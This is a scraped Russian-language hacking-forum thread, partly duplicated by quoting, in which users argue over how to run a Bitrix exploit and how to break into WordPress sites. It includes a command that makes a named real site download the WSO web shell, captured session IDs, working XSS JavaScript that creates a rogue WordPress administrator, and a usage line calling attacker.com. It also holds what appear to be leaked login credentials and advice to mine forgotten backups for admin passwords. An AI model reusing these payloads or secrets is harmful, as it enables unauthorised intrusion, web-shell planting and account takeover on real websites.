и что же покажет сущевствующий хост?Не вижу проблемы, просто хост не существующий
Код:php codex.php https://google.com system curl http://google.com/ ### composite_data problems ###
и что же покажет сущевствующий хост?Не вижу проблемы, просто хост не существующий
Код:php codex.php https://google.com system curl http://google.com/ ### composite_data problems ###
Cессию, результат загрузки, результат выполнения.и что же покажет сущевствующий хост?![]()
php codex.php https://www.bitrix24.com.br system curl https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
### PHPSESSID=PJ8zZwZPbkm40Fm2rvDOCmPQ8pvAboHc;, sessid=0fa69b0c6e228d31e1dad5b85e3b0fcb ###
###
###
var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;
req.open("GET", url, false);
req.send();
var nonce = regex.exec(req.responseText);
var nonce = nonce[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&email=hacker@example.com&pass1=AttackerP455&pass2=AttackerP455&role=administrator";
req.open("POST", url, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
// curl_setopt_array($curl, array(
// CURLOPT_URL => 'https://test.j3university.com/wp-json/jwt-auth/v1/token',
// CURLOPT_POST => TRUE,
// CURLOPT_RETURNTRANSFER => TRUE,
// CURLOPT_CUSTOMREQUEST => "POST",
// CURLOPT_POSTFIELDS => "username=vinay&password=YqiHcALG7wKuRaxA8nGGFNfF",
а ты уверен что вбивать нужно так как ты вбиваешь а не в сплойт добавлять эти строки?Cессию, результат загрузки, результат выполнения.
Код:php codex.php https://www.bitrix24.com.br system curl https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php ### PHPSESSID=PJ8zZwZPbkm40Fm2rvDOCmPQ8pvAboHc;, sessid=0fa69b0c6e228d31e1dad5b85e3b0fcb ### ### ###
А по вп, он бьется как сплоитами, так и без не смотря на автообнавление.
Банальная XSS может помочь тебе добавить админа (коих пачка и за этот год: https://sploitus.com/?query=wordpress) :
Код:var wp_root = "" // don't add a trailing slash var req = new XMLHttpRequest(); var url = wp_root + "/wp-admin/user-new.php"; var regex = /ser" value="([^"]*?)"/g; req.open("GET", url, false); req.send(); var nonce = regex.exec(req.responseText); var nonce = nonce[1]; var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&email=hacker@example.com&pass1=AttackerP455&pass2=AttackerP455&role=administrator"; req.open("POST", url, true); req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); req.send(params);
Так и банально забытый бэкап, может выдать тебе пасс казалось бы не брутабельного админа:
Вариантов масса с WP.
Ты уже издеваешься? Или что?а ты уверен что вбивать нужно так как ты вбиваешь а не в сплойт добавлять эти строки?![]()
минуси ыщо, терпилаТы уже издеваешься? Или что?
(!isset($argv[3]) ? exit(message('php '.basename(__FILE__).' "https://target-bitrix.com" "system" "curl http://attacker.com/"')) : @list($x, $url, $func, $farg) = $argv);
Contains an array of all the arguments passed to the script when running from the command line.
тоесть добавь ты строки в сплойт и запуcтив php codexloh.php оно не заработает?Продолжим просвещать, а вдруг реально все так плохо ;-)
$argv
Откуда такие выводы? Тебя просто попросили показать как запустить сплойт под битрикс, ты даже этого не осилил, немощ. Еще и пиздить начал что я бухой. Я в отличии от тебя не пью и не употребляю, а ты, обезъяна, видимо все мозги просолил, раз занимаешься такой х#йней - лезешь в тему нихуя вообще в ней не понимая.считает себя неебаца умным
зачем тебе сплойт под битрикс ты по снг работаешь?Откуда такие выводы? Тебя просто попросили показать как запустить сплойт под битрикс, ты даже этого не осилил, немощ. Еще и пиздить начал что я бухой. Я в отличии от тебя не пью и не употребляю, а ты, обезъяна, видимо все мозги просолил, раз занимаешься такой х#йней.
Добрый день. Мне кажется для начала нужно освоить минимальные основы самого вп, ибо без этого будет очень сложно понимать что и как работает, по поводу взлома, зависит от конкретных уязвимостей. Так же можно попробовать скрутить админку, но это не очень хороший вариант.Привет, ранее я обучался любой теме по стратегий "узнал, посмотрел гайды, практикуйся"
Но когда я начал изучать WordPress и как ломать подобные CMS споткнулся об второй этап моей "стратегий".
К примеру, индексирую сайт, знаю версию, знаю имя админа, увидел плагин, нашел эксплоит на exploit-db, а что делать дальше хз.
Вся информация которая мне доступна этогайды индусов на ютубе,хабр и журнал xakep. Брут по словарям и использование гитов 2022 разбиваются об сложный пароль или обновленную версию WP.
Заранее спасибо
upd: даже версия эксплойта для плагина 2019 года![]()